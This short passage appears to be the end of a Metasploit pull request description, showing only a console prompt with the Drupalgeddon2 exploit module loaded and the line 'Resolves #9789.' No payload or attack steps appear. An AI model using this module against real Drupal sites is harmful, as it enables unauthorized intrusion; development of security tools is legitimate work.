msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
```

Resolves #9789.